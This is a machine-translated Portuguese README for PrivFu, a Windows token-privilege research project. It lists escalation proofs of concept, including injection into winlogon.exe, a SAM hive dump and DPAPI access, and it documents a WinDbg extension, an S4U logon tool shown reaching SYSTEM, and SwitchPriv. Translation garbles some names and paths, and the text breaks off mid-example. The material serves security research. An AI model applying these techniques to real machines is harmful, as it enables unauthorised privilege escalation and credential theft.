PrivFu
1.0.0
Modo Kernel Extensão e POCs para testar como os privilégios do token funcionam.
Existem repositórios notáveis e artigos sobre o abuso de privilégios de token como o Priv2Admin de Grzegorz Tworek. Os códigos deste repositório destinam -se a ajudar a investigar como os privilégios do token funcionam.
De volta ao topo
Projeto
Este projeto abrange como obter privilégios do sistema do shell de alto nível de integridade. Consulte Readme.md para obter detalhes.
De volta ao topo
Projeto
O objetivo deste projeto é investigar como os invasores abusam do kernel arbitrário que escrevem vulnerabilidade. Todos os POCs são escritos para o driver Extreme Vulnerable Extreme. A maioria desses POCs é executada para obter o nível de integridade do sistema, abusando dos privilégios arbitrários do kernel e dos símbolos. Testado no Windows 10 versão 1809/1903, mas eles devem funcionar a maior parte do Windows 10 teoricamente:
| Nome do POC | Descrição |
|---|---|
| CreateEssigntokenVariant | Este POC realiza a EOP com SeCreateTokenPrivilege e SeAssignPrimaryTokenPrivilege . |
| CreatePersonateTekenVariant | Este POC realiza a EOP com SeCreateTokenPrivilege e SeImpersonatePrivilege . |
| CreateTokenVariant | Este POC realiza a EOP com SeCreateTokenPrivilege . |
| DebuginjectionVariant | Este POC realiza EOP com SeDebugPrivilege . Usa a injeção de código para winlogon.exe na fase final. |
| DebUpUpDateProcVariant | Este POC realiza EOP com SeDebugPrivilege . Cria o processo do sistema do WinLogon.exe com a API UpdateProcThreadAttribute na fase final. |
| RestoreservicemodificationVariant | Este POC realiza o EOP com SeRestorePrivilege . Use hijackshelllib com este POC. |
| SecundáriaLogonVariant | Este POC realiza a EOP com SeCreateTokenPrivilege e SeImpersonatePrivilege . Usa o serviço de logon secundário na fase final. |
| TakeOwnersHipServicemodificationVariant | Este POC realiza a EOP com SeTakeOwnershipPrivilege . Use hijackshelllib com este POC. |
| Tcbs4uassigntokenVariant | Este POC executa o EOP com SeTcbPrivilege . Obtenha um shell de nível obrigatório do sistema a partir do nível obrigatório médio. |
| TCBS4UIMPERSONATIONVARONT | Este POC executa o EOP com SeTcbPrivilege . Executa a representação do thread com o logon S4U. Não obtém nível de integridade alto ou do sistema. |
De volta ao topo
Projeto
Aviso
Em algum ambiente, o Debug Build não funciona. A construção de liberação é preferida.
O PRIVIDITOR é a extensão do Windbg do modo do kernel para manipular o privilégio de token de um processo específico. Esta extensão facilita a configuração do privilégio de token que você deseja investigar:
0: kd> .load C:devPrivEditorx64ReleasePrivEditor.dll
PrivEditor - Kernel Mode WinDbg extension for token privilege edit.
Commands :
+ !getps : List processes in target system.
+ !getpriv : List privileges of a process.
+ !addpriv : Add privilege(s) to a process.
+ !rmpriv : Remove privilege(s) from a process.
+ !enablepriv : Enable privilege(s) of a process.
+ !disablepriv : Disable privilege(s) of a process.
+ !enableall : Enable all privileges available to a process.
+ !disableall : Disable all privileges available to a process.
[*] To see command help, execute "!<Command> help" or "!<Command> /?".
Este comando é para listar processos em seu sistema de destino:
0: kd> !getps /?
!getps - List processes in target system.
Usage : !getps [Process Name]
Process Name : (OPTIONAL) Specifies filter string for process name.
Se você executar este comando sem argumentos, esta lista de comandos todos os processos em seu sistema de destino da seguinte forma:
0: kd> !getps
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
0 0xfffff805`81233630 0x00000000`00000000 Idle
4 0xffffd60f`ec068380 0xffffaf00`cec07a40 System
68 0xffffd60f`f1780480 0xffffaf00`d3b290a0 svchost.exe
88 0xffffd60f`ec0db080 0xffffaf00`cec0d080 Registry
324 0xffffd60f`ef342040 0xffffaf00`d0416080 smss.exe
348 0xffffd60f`f052f100 0xffffaf00`d25d30a0 dwm.exe
408 0xffffd60f`eca8e140 0xffffaf00`d21bd930 csrss.exe
480 0xffffd60f`f05a8340 0xffffaf00`d2568670 svchost.exe
484 0xffffd60f`efcd60c0 0xffffaf00`d06430e0 wininit.exe
500 0xffffd60f`efd130c0 0xffffaf00`d23100a0 csrss.exe
580 0xffffd60f`efdc0080 0xffffaf00`d2266630 winlogon.exe
--snip--
Se você quiser saber processos específicos, defina o filtro da string como segue. O filtro funciona com a correspondência avançada e insensível ao caso:
0: kd> !getps micro
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
4568 0xffffd60f`f14ed080 0xffffaf00`d3db60a0 MicrosoftEdge.exe
4884 0xffffd60f`f1647080 0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
4892 0xffffd60f`f1685080 0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe
Este comando é listar privilégios de token de um processo específico:
0: kd> !getpriv /?
!getpriv - List privileges of a process.
Usage : !getpriv <PID>
PID : Specifies target process ID.
Para usar este comando, você precisa definir um ID do processo de destino em formato decimal da seguinte maneira:
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
Este comando é adicionar privilégios de token a um processo específico:
0: kd> !addpriv /?
!addpriv - Add privilege(s) to a process.
Usage : !addpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
+ IncreaseQuota : SeIncreaseQuotaPrivilege.
+ MachineAccount : SeMachineAccountPrivilege.
+ Tcb : SeTcbPrivilege.
+ Security : SeSecurityPrivilege.
+ TakeOwnership : SeTakeOwnershipPrivilege.
+ LoadDriver : SeLoadDriverPrivilege.
+ SystemProfile : SeSystemProfilePrivilege.
+ Systemtime : SeSystemtimePrivilege.
+ ProfileSingleProcess : SeProfileSingleProcessPrivilege.
+ IncreaseBasePriority : SeIncreaseBasePriorityPrivilege.
+ CreatePagefile : SeCreatePagefilePrivilege.
+ CreatePermanent : SeCreatePermanentPrivilege.
+ Backup : SeBackupPrivilege.
+ Restore : SeRestorePrivilege.
+ Shutdown : SeShutdownPrivilege.
+ Debug : SeDebugPrivilege.
+ Audit : SeAuditPrivilege.
+ SystemEnvironment : SeSystemEnvironmentPrivilege.
+ ChangeNotify : SeChangeNotifyPrivilege.
+ RemoteShutdown : SeRemoteShutdownPrivilege.
+ Undock : SeUndockPrivilege.
+ SyncAgent : SeSyncAgentPrivilege.
+ EnableDelegation : SeEnableDelegationPrivilege.
+ ManageVolume : SeManageVolumePrivilege.
+ Impersonate : SeImpersonatePrivilege.
+ CreateGlobal : SeCreateGlobalPrivilege.
+ TrustedCredManAccess : SeTrustedCredManAccessPrivilege.
+ Relabel : SeRelabelPrivilege.
+ IncreaseWorkingSet : SeIncreaseWorkingSetPrivilege.
+ TimeZone : SeTimeZonePrivilege.
+ CreateSymbolicLink : SeCreateSymbolicLinkPrivilege.
+ DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
+ All : All privileges.
Por exemplo, se você deseja definir o Sedebugprivilege como um processo específico, defina um ID do processo de destino para o primeiro argumento e encurte o nome do privilégio debug conforme listado na mensagem de ajuda para o segundo argumento da seguinte maneira:
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
0: kd> !addpriv 5704 debug
[>] Trying to add SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
O argumento do nome do privilégio é insensível ao caso.
Se você deseja adicionar todos os privilégios de token de cada vez, defina all como o nome do privilégio argumento:
0: kd> !addpriv 5704 all
[>] Trying to add all privileges.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeMachineAccountPrivilege Disabled
SeTcbPrivilege Disabled
SeSecurityPrivilege Disabled
--snip--
Este comando é remover privilégios de token de um processo específico:
0: kd> !rmpriv /?
!rmpriv - Remove privilege(s) from a process.
Usage : !rmpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
Se você deseja remover o SechangenotifyPrivilege, execute este comando da seguinte forma:
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
0: kd> !rmpriv 352 changenotify
[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
AS !addpriv , você pode remover todos os privilégios de token em um momento, definindo all como o nome do privilégio argumento:
0: kd> !rmpriv 352 all
[>] Trying to remove all privileges.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
Este comando é ativar os privilégios de token de um processo específico:
0: kd> !enablepriv /?
!enablepriv - Enable privilege(s) of a process.
Usage : !enablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
O primeiro argumento é para o ID do processo, e o segundo é para o nome do privilégio de token:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 timezone
[>] Trying to enable SeTimeZonePrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
Se você tentou habilitar privilégios, ainda não adicionado, este comando adiciona -o automaticamente:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 debug
[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
Este comando é desativar privilégios de token de um processo específico:
0: kd> !disablepriv /?
!disablepriv - Disable privilege(s) of a process.
Usage : !disablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
Para usar este comando, defina um ID do processo de destino para o primeiro argumento e o nome do privilégio de token para o segundo argumento:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !disablepriv 1932 debug
[>] Trying to disable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
Este comando é para ativar todos os privilégios de token disponíveis para um processo específico:
0: kd> !enableall /?
!enableall - Enable all privileges available to a process.
Usage : !enableall <PID>
PID : Specifies target process ID.
Funciona da seguinte maneira:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !enableall 3792
[>] Trying to enable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
Este comando é desativar todos os privilégios de token para um processo específico:
0: kd> !disableall /?
!disableall - Disable all privileges available to a process.
Usage : !disableall <PID>
PID : Specifies target process ID.
Este comando é equivalente a !disablepriv <PID> all . Funciona da seguinte forma:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !disableall 3792
[>] Trying to disable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
De volta ao topo
Projeto
Este projeto é um POCS para privilégios sensíveis ao token como SeDebugPrivilege . Atualmente, lançou os POCs para uma parte deles.
| Nome do programa | Descrição |
|---|---|
| SeauditPrivileGePoc | Este POC tenta criar novos eventos de segurança pela (s) SeAuditPrivilegePoC . SeAuditPrivilege não requer alto nível de integridade, mas esse POC requer privilégios administrativos na primeira execução para instalar uma nova fonte de evento. Além disso, para confirmar o resultado, esse POC pode exigir modificação da configuração da política de segurança local. |
| SebackuppRivileGePoc | Este POC tenta despejar HKLMSAM por SeBackupPrivilege . |
| SECREATEPAGEFILEPRIVILEGEPOC | Este POC tenta definir a opção PageFile para valores específicos por SeCreatePagefilePrivilege . |
| SecreateTokenPrivileGePoc | Este POC tenta criar um token elevado por SeCreateTokenPrivilege . |
| SedebugprivilegePoc | Este POC tenta abrir uma alça para winlogon.exe por SeDebugPrivilege . |
| SerestoreprivileGePoc | Este POC tenta gravar arquivo de teste em C:WindowsSystem32 por SeRestorePrivilege . |
| Sesecurityprivilegepoc | Este POC tenta ler o mais recente evento de segurança da SeSecurityPrivilege . |
| SeshutdownPrivileGePoc | Este POC tenta causar o BSOD por SeShutdownPrivilege . |
| Sesystemenvironmentprivilegepoc | Este POC tenta enumerar o ambiente do sistema por SeSystemEnvironmentPrivilege . Funciona apenas para o sistema baseado em UEFI. Devido à funcionalidade do SO, este POC não funciona para os SOs anteriores do Windows 10 Build 1809. |
| SetrakenshiprivileGepoc | Este POC tenta alterar o proprietário do HKLM:SYSTEMCurrentControlSetServicesdmwappushservice para a conta de usuário de chamadas por SeTakeOwnershipPrivilege . |
| SetcbprivileGePoc | Este POC tenta executar o logon S4U para ser BuiltinBackup Operators por SeTcbPrivilege . |
| SetRustedCredManaccessPrivileGePoc | Este POC tenta acessar o DPAPI Blob por SeTrustedCredManAccessPrivilege . |
De volta ao topo
Projeto
Esta ferramenta é para executar o logon S4U com o setcbprivilege. Para executar o logon S4U com esta ferramenta, são necessários privilégios administrativos.
PS C:Tools> .S4uDelegator.exe -h
S4uDelegator - Tool for S4U Logon.
Usage: S4uDelegator.exe [Options]
-h, --help : Displays this help message.
-l, --lookup : Flag to lookup account SID.
-x, --execute : Flag to execute command.
-c, --command : Specifies command to execute. Default is cmd.exe.
-d, --domain : Specifies domain name to lookup or S4U logon.
-e, --extra : Specifies group SIDs you want to add for S4U logon with comma separation.
-n, --name : Specifies account name to lookup or S4U logon.
-s, --sid : Specifies SID to lookup.
Para usar esta ferramenta, o sinalizador -l ou -x deve ser especificado. -l Flag é para procurar informações da conta da seguinte forma:
PS C:Tools> .S4uDelegator.exe -l -d contoso -n "domain admins"
[*] Account Name : CONTOSODomain Admins
[*] SID : S-1-5-21-3654360273-254804765-2004310818-512
[*] Account Type : Group
PS C:Tools> .S4uDelegator.exe -l -s S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Name : NT SERVICEWinDefend
[*] SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
Para executar o comando com o logon S4U, set -x sinalizador e especifique o nome da conta ou SID da seguinte maneira. O comando para executar pode ser especificado com a opção -c (o padrão é cmd.exe ):
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> .S4uDelegator.exe -x -d . -n admin
[*] S4U logon target information:
[*] Account : CL01admin
[*] SID : S-1-5-21-2659926013-4203293582-4033841475-500
[*] UPN : (Null)
[*] Type : User
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.
C:Tools>whoami /user
USER INFORMATION
----------------
User Name SID
========== =============================================
cl01admin S-1-5-21-2659926013-4203293582-4033841475-500
Se você deseja adicionar informações extras em grupo, defina o SIDS do grupo com o valor separado de vírgula com a opção -e da seguinte forma:
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============= =============================================
contosodavid S-1-5-21-3654360273-254804765-2004310818-1104
PS C:Tools> .S4uDelegator.exe -x -d contoso -n jeff -e S-1-5-32-544,S-1-5-20 -c powershell
[*] S4U logon target information:
[*] Account : CONTOSOjeff
[*] SID : S-1-5-21-3654360273-254804765-2004310818-1105
[*] UPN : [email protected]
[*] Type : User
[>] Verifying extra group SID(s).
[*] BUILTINAdministrators (SID : S-1-5-32-544) will be added as a group.
[*] NT AUTHORITYNETWORK SERVICE (SID : S-1-5-20) will be added as a group.
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYThis Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK SERVICE Well-known group S-1-5-20 Mandatory group, Enabled by default, Enabled group
CONTOSOServerAdmins Group S-1-5-21-3654360273-254804765-2004310818-1103 Mandatory group, Enabled by default, Enabled group
Service asserted identity Well-known group S-1-18-2 Mandatory group, Enabled by default, Enabled group
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
AVISO
Se você experimentar o logon S4U com uma conta não privilegiada para a máquina de destino, obterá erro
0xC0000142(STATUS_DLL_INIT_FAILED) e o comando não poderá ser executado. Para evitar esse problema, adicione grupos privilegiados como grupos extras com opção-e.Adicional, alguma conta não pode ser especificada como grupo extra (por exemplo,
NT SERVICETrustedInstaller) para o logon S4U. Se você definir essas contas de grupo como grupo extra, o S4U Logon terá falhado com o erro0x00000005(ERROR_ACCESS_DENIED)
De volta ao topo
Projeto
Esta ferramenta é para ativar ou desativar privilégios de token específicos para um processo:
PS C:Dev> .SwitchPriv.exe -h
SwitchPriv - Tool to control token privileges.
Usage: SwitchPriv.exe [Options]
-h, --help : Displays this help message.
-d, --disable : Specifies token privilege to disable or "all".
-e, --enable : Specifies token privilege to enable or "all".
-f, --filter : Specifies token privilege you want to remain.
-i, --integrity : Specifies integrity level to set in decimal value.
-p, --pid : Specifies the target PID. Default specifies PPID.
-r, --remove : Specifies token privilege to remove or "all".
-s, --search : Specifies token privilege to search.
-g, --get : Flag to get available privileges for the target process.
-l, --list : Flag to list values for --integrity options.
-S, --system : Flag to run as "NT AUTHORITYSYSTEM".
Para listar valores para -a opção --integrity , execute com --list Flag da seguinte forma:
PS C:Dev> .SwitchPriv.exe -l
Available values for --integrity option:
* 0 : UNTRUSTED_MANDATORY_LEVEL
* 1 : LOW_MANDATORY_LEVEL
* 2 : MEDIUM_MANDATORY_LEVEL
* 3 : MEDIUM_PLUS_MANDATORY_LEVEL
* 4 : HIGH_MANDATORY_LEVEL
* 5 : SYSTEM_MANDATORY_LEVEL
* 6 : PROTECTED_MANDATORY_LEVEL
* 7 : SECURE_MANDATORY_LEVEL
Example :
* Down a specific process' integrity level to Low.
PS C:> .SwitchPriv.exe -p 4142 -s 1
Protected and Secure level should not be available, but left for research purpose.
O PID do processo de destino é especificado com a opção -p . Você pode listar privilégios disponíveis para o processo de destino com a opção -g sinalizador e -p da seguinte forma:
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
Quando -p opção não for especificada, o PID será pai PID para esta ferramenta:
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 6772
[*] Process Name : powershell
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
O nome do privilégio para controlar é especificado com qualquer caso de seqüências insensíveis que podem especificar um nome de privilégio exclusivo nos privilégios disponíveis para o processo de destino. Por exemplo, para ativar SeUndockPrivilege para o processo de destino, execute com a opção --enable da seguinte maneira:
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -e und
[>] Trying to enable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
Quando você define a string falsa que não pode especificar um nome de privilégio exclusivo, você receberá a seguinte mensagem:
PS C:Dev> .SwitchPriv.exe -p 9408 -e se
[>] Trying to enable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[-] Cannot specify a unique privilege to enable.
[*] SeShutdownPrivilege
[*] SeChangeNotifyPrivilege
[*] SeUndockPrivilege
[*] SeIncreaseWorkingSetPrivilege
[*] SeTimeZonePrivilege
[*] Done.
Por exemplo, para ativar o SechangenotifyPrivilege, execute com -opção --disable , como segue:
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -d chan
[>] Trying to disable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
Para remover o privilégio, use --remove a opção da seguinte forma:
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -r inc
[>] Trying to remove a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
